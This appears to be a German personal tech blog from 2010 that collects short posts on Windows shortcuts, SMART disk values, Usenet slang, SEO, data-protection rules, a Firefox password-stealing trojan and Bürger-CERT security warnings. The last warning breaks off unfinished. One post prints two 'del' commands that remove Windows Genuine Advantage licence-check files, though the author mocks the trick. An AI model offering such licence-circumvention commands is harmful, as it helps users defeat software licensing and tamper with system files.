Hallo, Seit den Anfängen des Internets gibt es auch mich im Internet und das ist eine verdammt lange Zeit! Wir lieben das WWW und möchten auf Highlights hinweisen, die irgendwo da drausen schlummern!
Samstag, 25. Dezember 2010
Illegale Anmelde-Versuche protokollieren
„Start" » „Einstellungen" » „Systemsteuerung" » „Verwaltung" » „Lokale Sicherheitseinstellungen" » „Anmeldeversuche überwachen" » „Fehlgeschlagen" etc
Das Video finden Sie in einer weitaus besseren Auflösung unter diesem Link:
http://www.franky4you.de/downloads/admin/
Externe Datenschutzbeauftragte und Datenschutzberater
Vorteil: Datenschutz leistet einen Beitrag bei der Gewinnung von Kundenvertrauen und kann damit einen Vorteil im Wettbewerb leisten.
Aufgabe: Datenschutzbeauftragte haben vorrangig die Datenverarbeitungsprogramme zu überwachen und das datenverarbeitende Personal mit dem Datenschutz vertraut zu machen.
Datenschutzbeauftragte müssen bestellt werden, wenn personenbezogene Daten (z. B. Arbeitnehmerdaten in der Personalabteilung, Kunden- und Interessentendaten) automatisiert verarbeitet werden:
- in allen öffentlichen Stellen (beispielsweise Behörden) und
- in nicht-öffentlichen Stellen (beispielsweise Unternehmen, Vereine, Rechtsanwaltskanzleien, Arztpraxen, Steuerkanzleien), wenn mindestens 10 Personen mit der Verarbeitung dieser Daten beschäftigt sind oder Zugriff auf diese Daten haben. Bei einer nicht automatisierten Datenverarbeitung greift die Vorschrift erst ab 20 Beschäftigten. Hierbei werden Teilzeitkräfte voll berücksichtigt. Unabhängig von der Mitarbeiterzahl muss ein Datenschutzbeauftragter bestellt werden, wenn die Organisation automatisierte Verarbeitungen durchführt, die einer so genannten Vorabkontrolle unterliegen, oder wenn sie personenbezogene Daten geschäftsmäßig verarbeitet, um diese an dritte Personen weiterzugeben (z. B. Adressdatenhandel).
Wer online werben will, braucht ehrliche Vergleichs - Zahlen!
Die Informationsgemeinschaft zur Feststellung der Verbreitung von Werbeträgern e. V. (Abk.: IVW) wird von den Medienunternehmen, den Werbungtreibenden sowie den Werbe- und Media-Agenturen in Deutschland unterhalten. Inhalt ihrer Tätigkeit ist das Sammeln valider Daten und deren Bereitstellung für die Leistungskontrolle von Werbeträgern (Vergleichsdaten).
Freitag, 26. November 2010
Anführungszeichen im internationalen Format setzen
Sonntag, 31. Oktober 2010
Das Originale Twitter Gezwitscher in Homepagen einbinden
Twitter / Resources
Donnerstag, 21. Oktober 2010
Coole Infos zur richtigen Nutzung von Keywords
Why do the first 250 words matter?
The first 250 words of web page copy are the most important. They tell both people and search engines what the page is about.The top two to three keywords should appear about five times each in the first 250 words of web page copy, and two to three times each for every additional 250 words on the page.
Web copy should be written for human visitors first, and search engines second. Synonyms, plurals and correct tenses for keywords should be used as appropriate. Contrary to popular myth, search engines will notice these slight variations as instances of keywords.
Es sollten also die ersten 2-3 Schlüsselworte in den ersten 250 Worten ca. 5 x auftauchen und sollten sich in jeden weiteren 250 Worten noch ca. 3 x wiederholen.
Mittwoch, 20. Oktober 2010
Paradisoft RSS Popper
Paradisoft RSS Popper
Dienstag, 19. Oktober 2010
Warnung vor Nebenverdienst-Angeboten im Internet
"Paid4" heißt die Nebenverdienst-Szene, die sich "Päid for" ausspricht und übersetzt "bezahlt für" bedeutet. Zu der Szene zählen Surfer, die sich für ihre Aktivitäten im Netz bezahlen lassen – etwa, indem sie Internetseiten anklicken oder Werbebanner anschauen.
Doch bevor der Rubel rollt, ist stets eine Anmeldung bei den Betreibern der Dienste erforderlich. Und die machen oft erst mal selbst gute Nebengeschäfte: mit den Daten der Kunden. So sichern sich einige Internetportale bei der Anmeldung beispielsweise das Recht, Daten wie Name, Geburtsdatum, Handynummer und Hobbies für "Wettbewerbe, Werbe-SMS und andere Marketing Aktionen" weiterzugeben oder "an zahlende Werbekunden" zu verkaufen.
Einen absolut klasse recherchierten Beitrag finden Sie bei Computer Wissen
http://preview.tinyurl.com/33capv5
Helfen, ohne sich selbst in Gefahr zu bringen
der Polizei. Damit ein Helfer oder eine Helferin nicht selbst zum Opfer
wird, gilt es, die Situation richtig einzuschätzen und immer auch die
eigene Sicherheit im Blick zu haben. Für den Ernstfall hat die Polizei
deswegen sechs Regeln für richtiges Verhalten entwickelt. Diese finden sich
auf einem Info-Kärtchen, das in jeden Geldbeutel passt, und im Ernstfall
eine große Hilfe sein kann.
Die sechs Regeln:
- Ich helfe, ohne mich selbst in Gefahr zu bringen.
- Ich fordere andere aktiv und direkt zur Mithilfe auf.
- Ich beobachte genau, präge mir Täter-Merkmale ein.
- Ich organisiere Hilfe unter Notruf 110.
- Ich kümmere mich um Opfer.
- Ich stelle mich als Zeuge zur Verfügung.
Das Info-Kärtchen und weitere Medien der Aktion-tu-was sind bei Ihrer
nächstgelegenen (Kriminal-)Polizeilichen Beratungsstelle erhältlich und als
Download eingestellt unter:
http://www.aktion-tu-was.de/service/mehr-zivilcourage
Tja das war wohl NIX!
Hi Frank,
Thanks for your interest in Mojeek personal search, although unfortunately we have decided to disable the feature whilst we finalise a major upgrade to the system in the next few weeks/month. After that time we're not sure whether the personal search will return or not, or if it does in what format.
Sorry I couldn't be more help at present.
Regards,
Marc
Die entsprechenden Hinweise auf den WebSeiten werden wir sukzessive wieder rausnehmen!
Montag, 18. Oktober 2010
Den Blog unter die Leute bringen
Freitag, 15. Oktober 2010
Malware als Passwortdieb: Schadsoftware konfiguriert Browser Firefox um - Magnus.de
"Passwortdieb - Malware konfiguriert Firefox um"
Ein Schädling manipuliert eine Konfigurationsdatei von Firefox, um Passwörter ausspionieren zu können. Er konfiguriert den Browser so, dass dieser ohne Rückfrage beim Benutzer alle Passwörter speichert, die für Anmeldungen im Web eingegeben werden.
Im Webbroot Threat Blog berichtet Andrew Brandt über ein Trojanisches Pferd namens 'Trojan-PWS-Nslog', das auch aktuelle Firefox-Versionen manipulieren kann. Standardmäßig fragt Firefox nach Eingabe eines Passworts auf einer Website, ob der Benutzer das Passwort speichern möchte. Anwender können das Speichern von Passwörtern ganz abschalten, eine Möglichkeit Passwörter ohne.....
Verfügbare Tastenkombinationen in Windows XP
Allgemeine Tastenkombinationen
| [STRG]+[C] | Kopieren |
|---|---|
| [STRG]+[X] | Ausschneiden |
| [STRG]+[V] | Einfügen |
| [STRG]+[Z] | Rückgängig |
| [ENTF] | Löschen |
| [UMSCHALT]+[ENTF] | Markiertes Element dauerhaft entfernen, ohne es in den Papierkorb zu verschieben |
| [STRG] beim Ziehen eines Elements | Markiertes Element kopieren |
| [STRG]+[UMSCHALT] beim Ziehen eines Elements | Verknüpfung zum markierten Element erstellen |
| [F2] | Markiertes Element umbenennen |
| [STRG]+[NACH-RECHTS-TASTE] | Einfügemarke an den Anfang des nächsten Wortes stellen |
| [STRG]+[NACH-LINKS-TASTE] | Einfügemarke an den Anfang des vorigen Wortes stellen |
| [STRG]+[NACH-UNTEN-TASTE] | Einfügemarke an den Anfang des nächsten Absatzes stellen |
| [STRG]+[NACH-OBEN-TASTE] | Einfügemarke an den Anfang des vorigen Absatzes stellen |
| [STRG]+[UMSCHALT] mit einer beliebigen Pfeiltaste | Textblock markieren |
| [UMSCHALT] mit einer beliebigen Pfeiltaste | Mehrere Elemente in einem Fenster oder auf dem Desktop markieren oder Text in einem Dokument markieren |
| [STRG]+[A] | Alles markieren |
| [F3] | Datei oder Ordner suchen |
| [ALT]+[EINGABE] | Eigenschaften des markierten Elements anzeigen |
| [ALT]+[F4] | Aktives Element schließen oder aktives Programm beenden |
| [ALT]+[EINGABE] | Eigenschaften des markierten Objekts anzeigen |
| [ALT]+[LEERTASTE] | Kontextmenü für aktives Fenster öffnen |
| [STRG]+[F4] | In Programmen, die das gleichzeitige öffnen mehrerer Dokumente zulassen: Aktives Dokument schließen |
| [ALT]+[TAB] | Zwischen geöffneten Elementen wechseln |
| [ALT]+[ESC] | Elemente in der Reihenfolge durchlaufen, in der sie geöffnet wurden |
| [F6] | Bildschirmelemente in einem Fenster oder auf dem Desktop durchlaufen |
| [F4] | Adressleistenliste in "Arbeitsplatz" oder im Windows Explorer anzeigen |
| [UMSCHALT]+[F10] | Kontextmenü für markiertes Element anzeigen |
| [ALT]+[LEERTASTE] | Systemmenü für aktives Fenster anzeigen |
| [STRG]+[ESC] | Startmenü anzeigen |
| [ALT]+Unterstrichener Buchstabe in einem Menünamen | Entsprechendes Menü anzeigen |
| Unterstrichener Buchstabe in einem Befehlsnamen oder in einem geöffneten Menü | Entsprechenden Befehl ausführen |
| [F10] | Menüleiste im aktiven Programm aktivieren |
| [NACH-RECHTS-TASTE] | Nächstes Menü nach rechts oder Untermenü öffnen |
| [NACH-LINKS-TASTE] | Nächstes Menü nach links öffnen oder Untermenü schließen |
| [F5] | Aktives Fenster aktualisieren |
| [RüCKTASTE] | übergeordneten Ordner in "Arbeitsplatz" oder im Windows Explorer anzeigen |
| [ESC] | Aktuellen Vorgang abbrechen |
| [UMSCHALT] beim Einlegen einer CD-ROM in das CD-ROM-Laufwerk | Automatisches Abspielen der CD-ROM verhindern |
Tastenkombinationen für Dialogfelder
| [STRG]+[TAB] | Vorwärts durch die Registerkarten navigieren |
|---|---|
| [STRG]+[UMSCHALT]+[TAB] | Rückwärts durch die Registerkarten navigieren |
| [TAB] | Vorwärts durch die Optionen navigieren |
| [UMSCHALT]+[TAB] | Rückwärts durch die Optionen navigieren |
| [ALT]+Unterstrichener Buchstabe | Entsprechenden Befehl ausführen oder entsprechende Option auswählen |
| [EINGABE] | Befehl für aktive Option oder Schaltfläche ausführen |
| [LEERTASTE] | Kontrollkästchen aktivieren oder deaktivieren, wenn die aktive Option ein Kontrollkästchen ist |
| Pfeiltasten | Schaltfläche auswählen, wenn die aktive Option eine Gruppe von Optionsschaltflächen ist |
| [F1] | Hilfe anzeigen |
| [F4] | Elemente in der aktiven Liste anzeigen |
| [RüCKTASTE] | übergeordneten Ordner anzeigen, wenn ein Ordner im Dialogfeld Speichern unter oder öffnen markiert ist |
Tastenkombinationen für den Windows Explorer
| [ENDE] | Ende des aktiven Fensters anzeigen |
|---|---|
| [POS1] | Anfangs des aktiven Fensters anzeigen |
| [NUM]+Stern (*) | Alle Unterordner zum markierten Ordner anzeigen |
| [NUM]+Pluszeichen (+) | Inhalt des markierten Ordners anzeigen |
| [NUM]+Minuszeichen (-) | Markierten Ordner reduzieren |
| [NACH-LINKS-TASTE] | Aktuelle Auswahl reduzieren, sofern sie erweitert ist, oder übergeordneten Ordner markieren |
| [NACH-RECHTS-TASTE] | Aktuelle Auswahl erweitern, sofern sie reduziert ist, oder ersten Unterordner markieren |
Navigation im Microsoft Internet Explorer
| [STRG]+[B] | Dialogfeld Favoriten verwalten öffnen |
|---|---|
| [STRG]+[E] | Suchleiste öffnen |
| [STRG]+[F] | Dienstprogramm "Suchen" starten |
| [STRG]+[H] | Leiste "Verlauf" öffnen |
| [STRG]+[I] | Leiste "Favoriten" öffnen |
| [STRG]+[L] | Dialogfenster öffnen öffnen |
| [STRG]+[N] | Weitere Browserinstanz mit derselben Webadresse öffnen |
| [STRG]+[O] | Dialogfenster öffnen öffnen, wie bei [STRG]+[L] |
| [STRG]+[P] | Dialogfenster Drucken öffnen |
| [STRG]+[R] | Aktuelle Webseite aktualisieren |
| [STRG]+[W] | Aktuelles Fenster schließen |
Navigation mit Windows Taste
- Windows + M minimiert alle Fenster, die einen Button in der Taskleiste haben und zeigt den Desktop; Fenster ohne Taskleisten-Button werden so zugänglich.
- Windows + Shift + M stellt alle zuvor minimierten Fenster wieder her.
- Windows + D minimiert die komplette Fensterlandschaft zum Desktop und zurück.
- Windows + E öffnet ein Fenster des Windows-Explorers.
- Windows + F öffnet die Suchfunktion.
- Windows + R öffnet das Fenster Ausführen.
- Windows + L sperrt den Rechner (Anwendungen laufen weiter, zum erneuten Zugriff ist die Eingabe des Kennwortes erforderlich).
- Windows + Pause öffnet das Fenster „Systemeigenschaften“.
- Windows + U erlaubt jederzeit Zugriff auf die Eingabehilfen.
Freitag, 8. Oktober 2010
Benutzer Definierter Player für YouTube
http://www.youtube.com/custom_player
Mit dem benutzer definierten Player lassen sich YouTube Playlisten in einen schickeren Player einbetten und auch besser auf einer Homepage anbieten.
Jetzt fehlt mir blos noch der Link mit der ich zur Übersicht meiner bisherigen YouTube Player komme.
Kennt den jemand?
Und da habe ich den Link doch auch schon!
Denn wer unten auf den Abbrechen Button klickt, der wird auf die Seite:
http://www.youtube.com/my_players
geleitet. Und diese Seite hat die wunderbare Überschrift!
Benutzerdefinierte Videoplayer
Sonntag, 3. Oktober 2010
What does one TRILLION dollars look like?
Freitag, 1. Oktober 2010
META Angaben bei Blogger ändern
Damit wird für die Eingangsseite des Blogs eine Beschreibung und Schlüsselworte an die SEO übermittelt. Für die übrigen Blogseiten werden zumindest die Schlüsselwörter eingetragen. Die Beschreibung entfällt für die übrigen Seiten.
Blogger läßt nur eine umständlich auszuführende Abfrage in den Metaangaben des Blogs zu, die zudem nach jedem neuen Blogartikel wieder abgeändert werden müßte. Diese Lösung ist mir absolut zu umständlich, da macht das schnelle Blogen einfach keinen Sinn mehr!
Da nimm ich lieber dann die mittelmäßige SEO Freundlichkeit in Kauf!
Dienstag, 28. September 2010
Wir ziehen um auf neue Server!
Die Erfahrungen, die wir bei dem Umzug sammeln dürfen, werden wir Euch noch in den passenden Kategorien mitteilen, aber im Augenblick sind
* eMail Server konfigurieren
* eMail Klients konfigurieren
* Passwort geschützte Bereiche einrichten
* Datenbanken exportieren
* Datenbanken importieren
* Domains ummelden
* Subdomains einrichten
* Server in den Anwendungen konfigurieren
* .....
und jede Menge anderer Dinge angesagt. Dementsprechend wird es in den nächsten Wochen und Monaten wohl weniger mit neuen Features und alt gewohntes dürfte ab und an holprig sein.
Trotzdem: Wir bemühen uns natürlich die Einschränkungen so gering, wie möglich zu halten!
Freitag, 24. September 2010
Tastenkombination in den Internet - Browsern
Zum blitzschnellen Blättern durch die Tabs eine praktische Sache..
[Strg][T] - eine neue Registerkarte öffnen
[Strg][Bild rauf] - zur Registerkarte links vom aktuellen Tab springen
[Strg][Bild runter] - zur Registerkarte links vom aktuellen Tab springen
Tastenkombination für den Internet Explorer von Microsoft
F4 In die Adresszeile springen
F5 Seite aktualisieren
F11 Vollbild
Alt Menüleiste temporär einblenden
Alt-Links Vorherige Seite
Alt-M Homepage aufrufen
Alt-Rechts Nächste Seite
Alt-Return Eingegebene URL in neuer Registerkarte/Tab öffnen
Esc Ladevorgang der aktuellen Seite abbrechen
Strg-”+” Web-Seite vergrößern
Strg-”-” Web-Seite verkleinern
Strg-D Aktuelle Seite zu Favoriten hinzufügen
Strg-E In die Suchleiste springen
Strg-F Aktuelle Seite durchsuchen
Strg-H Verlauf aufrufen
Strg-I Favoriten aufrufen
Strg-J RSS-Feeds aufrufen
Strg-N Neues Fenster öffnen
Strg-P Drucken
Strg-Q Miniaturansichten aller Registerkarten/Tabs
Strg-R Neue Registerkarte/Tab öffnen
Strg-Tab Zwischen Registerkarten/Tabs wechseln
Strg-W Aktuelle Registerkarte/Tab schließen
Windows Genuine Advantage entfernen
Diese Prozedur ist übrigens nicht der neueste in diesem Metier. Er wurde eigentlich bereits vor etlichen Jahren in den Anfängen des Windows XP zum Thema WGUI auf vielen Plattformen diskutiert!
Hat also bereits eher geschichtlichen Charakter!
del %Windir%\system32\WgaTray.exe.alt
del %Windir%\system32\LegitCheckControl.dll
Auf gut Deutsch gesagt, also echter Schwachsinn! Nicht nur, daß jeder, der vor über 3400 Tagen dieses Tutorial las, welches heute sogar in Computerzeitschriften zu finden ist, las, zum Staatsfeind avancierte, NEE bei jedem automatisiertem Update wurde dieser komplizierte HAck von neuem notwendig oder XP rotzte einfach ab!
Leute spendet weniger Euren Parteien und kauft Euch endlich ne LIZENZ!
SMART Werte - Self-Monitoring, Analysis and Reporting Technology
| Parametername | Bedeutung |
| Raw Read Error Rate | Kritisch. Ein niedriger Wert weist auf unkorrigierbare Lesefehler hin, die mit der Plattenoberfläche oder mit den Leseköpfen zusammen hängen. |
| Througput Performance | Kritisch. Allgemeiner Indikator für den Datendurchsatz. Niedrige Werte zeigen, dass die Platte nicht mehrin vollem Tempo arbeiten kann. |
| Spin Up Time | Mittlere Startzeit des Motors, der die Platten antreibt. Schlechte Werte können auf Lagerprobleme hinweisen, die oft von zu hohen Temperaturen kommen. |
| Start/Stop Count | Unkritisch. Zählt die Start/Stop-Vorgänge des Laufwerks. |
| Reallocated Sector Count | Sehr kritisch. Zählt, wieviele Reservesektoren die Festplatte bereits genutzt hat. Deutet auf Medienprobleme hin. |
| Read Channel Margin | Gibt an, wie viel der Bandbreite bei Lesevorgängen im Mittel genutzt wird. Die genaue Bedeutung ist undokumentiert. |
| Seek Error Rate | Kritisch. Zählt die Fehler bei Lesevorgängen, die vom Zustand des Positionierungssystems, oder von der Oberfläche abhängig sind. |
| Seek Time Performance | Allgemeiner Wert, der die Leistung der Leseköpfe beschreibt. Niedrige Werte weisen auf Mechanische Probleme hin. |
| Power On Hours Count | Zählt die Betriebsstunden der Platte. Meist in einem herstellerspezifischen Format. |
| Spin Retry Count | Kritisch. Gibt an, wie oft der Motor anlaufen musste, damit die Platte ihre betriebstypische Umdrehungszahl erreich. |
| Recalibration Retries | Kritisch. Zählt, wie oft die Platte die Schreib-Leseköpfe neu kalibrieren musste. Weißt auf mechanische Fehlfunktionen hin. |
| Device Power Cycle Count | Zeigt die Statistik, wie oft das Laufwerk ein- und ausgeschaltet wurde. |
| Soft Read Error Rate | Gibt an, wie oft das Betriebssystem die gelesenen Daten als fehlerhaft verworfen hat |
| G-Sense Error Rate | G-Sense steht für einen Schock-Sensor, der heftige Erschütterungen im Betrieb misst |
| Power-Off Retract Cycle | Zählt lediglich, wie oft die Festplatte abgeschaltet wurde |
| Load/Unload Cycle Count | Gibt an, wie oft die Platte ihre Schreib- und Leseköpfe in die Parkposition (Landing Zone) gefahren hat. |
| Temperature | Gibt die Temperatur des Laufwerks an. Eher unwichtig, da die Messung bei den meisten Geräten sehr ungenau ist. |
| Reallocation Events Count | Sehr kritisch. Zählt jeden Versuch der Platte, Sektoren umzumappen, auch wenn dies nicht gelingt. |
| Current Pending Sector Count | Sehr kritisch. Gibt die Anzahl der instabilen Sektoren an, die auf eine Verschiebung in den reservierten Bereich warten. |
| Uncorrectable Sector Count | Sehr kritisch. Die Anzahl der fehlerhaften Sektoren, welche die interne Plattenlogik nicht restaurieren und in den reservierten Bereich verschieben kann |
| UltraDMA CRC Error Rate | Kritisch. Anzahl der Prüfsummenfehler bei der Datenübertragung. Kann auch auf defekte Kabel, Treiberkonflikte oder auf Übertaktungsprobleme hinweisen |
| Write Error Rate | Kritisch. Zählt, wie oft Fehler beim Schreiben von Sektoren aufgetreten sind. |
| Disk Shift | Sehr Kritisch. Dieser Wert gibt an, ob sich aufgrund von Temperaturproblemen oder Schockeinwirkungen eine Umwucht gebildet hat. |
| Loaded Hours | Gibt an, wie lange die Platte unter Volllast stand. Der Indikator dafür sind die Bewegungen des Plattenarms. |
| Load/Unload Retry Count | Zählt in einer undokumentierten Einheit, wie oft die Schreib-Leseköpfe die Position geändert haben |
| Load Friction | Zeigt einen statistischen Wert, wie hoch der Reibungswiederstand beim Bewegen des Plattenarmes ist |
| Load-in Time | Gibt an, wie lange sich der Plattenarm nicht in der Landing Zone geparkt war. |
| Torque Amplification Count | Zählt, wie oft die interne Logik der Platte das Drehmoment neu anpassen musste |
| GMR Head Amplitude | Ein rein statistischen Wert über die zurückgelegte Distanz der Schreib-Leseköpfe während einer Bewegung. |
Passende Programme zum Auslesen der SMART Werte:
Open Directory Project (ODP)
- Warten Sie mit der Anmeldung bis zur vollständigen Fertigstellung
- Überprüfen Sie vor der Anmeldung, ob Ihre Seite bereits aufgenommen ist
- Wählen Sie die passende Kategorie aus
- Erstellen Sie einen passenden Titel
- Formulieren Sie Sie eine gute Beschreibung
- Geben Sie Ihre Hauptdomain an
- Melden Sie Ihre Seite nur einmal an
- Speichern Sie alle Ihre Angaben
- Nutzen Sie die 'Eintrag aktualisieren' Funktion
Online genutzte Abkürzungen
Das Usenet (urspr. Unix User Network – engl. „Netzwerk für die Benutzer von Unix“) ist ein weltweites, elektronisches Netzwerk, das Diskussionsforen (so genannte „Newsgroups“) aller Art bereitstellt und an dem grundsätzlich jeder teilnehmen kann.
ACK - Acknowledge – Zustimmung. Gegenteil: NACK.
AFAIK – As far as I know – Soweit ich weiß
AFAIR – As far as I remember – Soweit ich mich erinnere
AFAI(C)S – As far as I (can) see – Soweit ich die Sache überblicke(n kann)
aka - also known as ... – auch bekannt als ...
AOL - „Finde ich auch“.
Artikel, Posting - Einzelner Beitrag in einer Gruppe. Das Abschickens eines Artikels nennt man „posten“.
BOFH - Bastard Operator From Hell
BTDT - Been there, done that – „ich war da und hab’s selbst probiert“ GTLT got that lousy T-shirt – „und hab dieses blöde T-Shirt bekommen“.
BTW - By The Way – Übrigens...
Cancel, canceln - Löschen eines Artikels.
CMIIW - Correct me if I’m wrong – „Korrigiert mich, wenn ich falsch liege“.
Crossposting - X-Posting xpost - Wenn man einen Artikel in mehrere Gruppen senden will
DAU - Dümmster Anzunehmender User
/dev/null - Untschüss.
EOD - End of discussion – „damit ist das Thema für mich erledigt, ich werde mich nicht mehr dazu äußern.“
EOT - End of thread/topic - Vorschlag, eine (fruchtlose) Diskussion komplett zu beenden.
FAQ - (gesprochen entweder „Eff-Ah-Kuh“ oder, wenn du dich traust, „fack“)
Frequently Asked Questions, „Fragen, die immer wieder gestellt werden“
Flame - persönlich verletzender Artikel
Flamewar - Artikel der alle Mitleser einfach nur genervt.
Follow-Up - Abkürzung: „F'up“. Artikel, der auf einen anderen Artikel Bezug nimmt.
Followup-To - Abkürzung: „F'up2“ - Angabe im Header, wohin Follow-Ups geschickt werden.
FRZ - Fragezeichen
„fuppen“ - Verb zu „F’up2“. Umleiten einer Diskussion
GABELN - Gruppe Area Brett Echo Liste Newsgroup.
Gruppe, Newsgroup, Forum - „Schwarzes Brett“ im Usenet, an dem sich die Artikel befinden.
^H - aus Versehen etwas falsches gesagt
^W - aus Versehen etwas falsches gesagt
Header - „Briefkopf“ eines Artikels
HTH - Hope that helps – „Ich hoffe, deine Frage ist damit zumindest so weit beantwortet, dass du erst einmal weiter kommst...“
IANAL - I am not a lawyer – „Ich bin kein Jurist“ - „Disclaimer“
IBTD - I beg to differ – „Bei allem Respekt, ich bin anderer Meinung“.
IIRC - If I remember/recall correctly – „Wenn ich mich recht erinnere...“
IM(H)O - In my (humble) opinion – „Meiner (bescheidenen) Meinung nach...“
die ~ machen - Ein Followup auf einen eigenen Artikel schreiben
IOW - In other words – „Mit anderen Worten...“
IRL - In Real Life – „im wirklichen Leben“
Jehova - Rotes Tuch - „JHVH“. Strenggläubigen Juden ist es verboten, diesen Namen in den Mund zu nehmen.
JFTR - Just for the record – „nur fürs Archiv“ - „nur zur Kenntnis“.
Killfile - Filterliste
LART - Luser Attitude Readjustment Tool – „Werkzeug zum Neuabgleich der Einstellung des Lusers“
LOL - Laugh out loud – Lautes Lachen.
RO(T)FL – Rolling On The Floor Laughing („wälze mich vor Lachen auf dem Boden“). ROFLASTC – ...And Scaring The Cat. Beliebig weiterführbar.
ROTFLBTCDICAJTTWADBSISWTRHITSBKABAYB: „Rolling On The Floor Laughing, Biting The Carpet, Dancing In Circles And Jumping Through The Window Almost Dying By Smashing Into Someone Who Then Runs Horrified Into The Street Being Killed Accidentally By A Yellow Bulldozer“
lurken, Lurker - „still“ mitlesen
man [...] - „man ...“ „Informiere dich bitte über [...], dann kannst du deine Frage selbst beantworten.“
Multiposting - → Crossposting
MUSEN - Meinem unmaßgeblichen Sprachempfinden nach.
Netcop - Rentnern mit Fernglas hinter der Gardine
Netiquette - elementare Benimmregeln für’s Usenet
Newbie - im Usenet noch neu
Newsreader - Programm für das Usenet
NUA - News User Agent – anderes Wort für Newsreader.
Nuhr - „Wenn man keine Ahnung hat: Einfach mal Fresse halten!“
OjE - User des Microsoft- Newsreader Outlook Express.
OP - Originalposting oder Originalposter
OT - Off topic – nicht zum Thema bzw. Themenbereich der Gruppe gehörend
Pawlow - eine mechanische und oft unangebrachte Reaktion
Plenken - vor Satzzeichen (besonders Frage- und Ausrufzeichen) einen Leerschritt setzen.
*PLONK* - Der Name eines Mitlesers auf dem Boden eines Killfiles aufgeschlagen
PM - Private Mail
Pointer - Stelle, wo eine Information zu finden ist
Popcorn - Diskussion zu einem Thema, das schon x Mal durchdiskutiert wurde
posten - Abschicken eines Usenet- Artikels
Pratchett - „Mehrfache Ausrufzeichen sind ein sicheres Zeichen eines kranken Geistes“
Quote, Zitat
ROT13 - alphabetische Rotation um 13 Stellen
RTFM - Read that f***ing manual! – „Lies das verd***te Handbuch!“
s/abc/xyz/ - Kurzform für: „Ersetze abc durch xyz“.
SCNR - Sorry, could not resist – „Entschuldigung, das konnte ich mir nicht verkneifen“
score adjusted - „ Scorefile angepasst“
Scorefile - „Intelligentes“ Bewertungssystem für Newsartikel
Shift-Taste, defekte - Eigenwillige Auslegung der Regeln zur Groß- und Kleinschreibung
Signatur, Sig - Fußzeile eines Postings
sinnfrei - „sinnlos“ oder „unsinnig“.
Spellflame - Missbrauch von Rechtschreibschwächen des Diskussionsgegners als Argument
Subject - Betreffzeile eines Artikels
Supersedes - Ein Artikel, der einen anderen ersetzt
Tante Gu - Weiß alles!
Thread - Gesamtheit eines Originalpostings und sämtlicher Follow-Ups
TIA - Thanks In Advance – „Danke im Voraus“
Tischkante - beißt vor Lachen in die Tischkante
TLA - Three Letter Acronym – „Drei-Buchstaben-Abkürzung“.
[tm] - Kürzel für „trademark“
TOFU - logische Folge von Frage und Antwort wird auf den Kopf gestellt.
Troll, Elch - bewusst herumpöbelnder Artikel
Usenetverwaltung - jeder passt auf sich selbst auf.
-v - „Das verstehe ich so nicht – könntest du es mal etwas ausführlicher darlegen?“
WFM - Works For Me – „Bei mir geht’s“
Wowereit - „Und das ist auch gut so“.
WWG - „Wieder was gelernt“
xf'up2 - Abkürzung für „ X-Post & F'up2 “
Xpost - Abkürzung für Crosspost.
YMMD - You Made My Day – „Du hast mir den Tag gerettet“
YMMV - Your Mileage May Vary „Unter anderen Umständen kann man natürlich auch zu ganz anderen Ergebnissen/Ansichten kommen“.
42 - „Zweiundvierzig“, niemand weiß mehr, wie die Frage eigentlich genau lautet.
!= - „... ist etwas anderes als ...“
Mittwoch, 22. September 2010
Cuil SEO ist DOWN
Wir fanden diese Suchmaschine zwar recht gut vor allen Dingen als Webmaster wegen den diversen Möglichkeiten / Features für die eigene Homepage, aber das genügte wohl nicht um im Kampf der Giganten zu bestehen. Schade drum! Ansonsten hätten wir es noch vor ein paar Jahren nicht für möglich gehalten, daß eine so große Suchmaschine pleite gehen kann! Aber anscheinend ist heute wirklich nichts mehr unmöglich. An der Qualität der Suchmaschine lag es nach unserem Ermessen nicht, wohl eher an der fehlenden Resonanz Ihrer Besucher!
Ausführliche Meldung (in English)
Samstag, 11. September 2010
Mal ein kleiner Test für die Sicherheit
Meine Absicht ist es:
Die technischen Warnungen unseres Bundesministerium für Datensicherheit in der Informationstechnologie (BSI) und die eMail - Virenmeldungen des Viren - Tickers in Monaten zusammengefasst zu posten.
...
Es folgen die technischen Warnungen unseres Bundesministerium für Datensicherheit in der Informationstechnologie (BSI)
Zusammenfassung der Technischen Warnungen im Monat September
Die Details der Meldungen sind fuer Sie online abrufbar unter
http://www.buerger-cert.de
-----------------------------------------------------------------------
Sicherheitsupdate fuer Adobe Flash Player [Bcert-2010-0093/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0093
-----------------------------------------------------------------------
Microsoft Patchday September 2010 [Bcert-2010-0094/1]
Risiko: Mittel
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0094
-----------------------------------------------------------------------
Apple Mac OS X Sicherheitsupdate 2010-006 [Bcert-2010-0095/1]
Risiko: Mittel
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0095
-----------------------------------------------------------------------
-----------------------------------------------------------------------
Apple QuickTime Player 7.6.8 [Bcert-2010-0092/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0092
-----------------------------------------------------------------------
-----------------------------------------------------------------------
Mozilla Foundation aktualisiert Firefox, Thunderbird und Seamonkey
[Bcert-2010-0088/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0088
-----------------------------------------------------------------------
Apple Safari Safari 5.0.2 and Safari 4.1.2 [Bcert-2010-0089/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0089
-----------------------------------------------------------------------
Apple iPhone und iPod Touch [Bcert-2010-0090/1]
Risiko: Mittel
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0090
-----------------------------------------------------------------------
Adobe Reader und Acrobat 9.3.4 [Bcert-2010-0091/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0091
-----------------------------------------------------------------------
Mal sehen ob was nützliches dabei herauskommt?
Technische Warnungen des Buerger-CERT
[Bcert-2010-0093/1]:
Sicherheitsupdate fuer Adobe Flash Player
Risiko: Hoch
Betroffene Systeme:
Adobe Flash Player Version 10.1.82.76 und frueher fuer Windows, Macintosh, Linux und Solaris
Adobe Flash Player Version 10.1.92.10 und frueher fuer Android
Adobe Flash Player vor Version 9.0.283
Empfehlung:
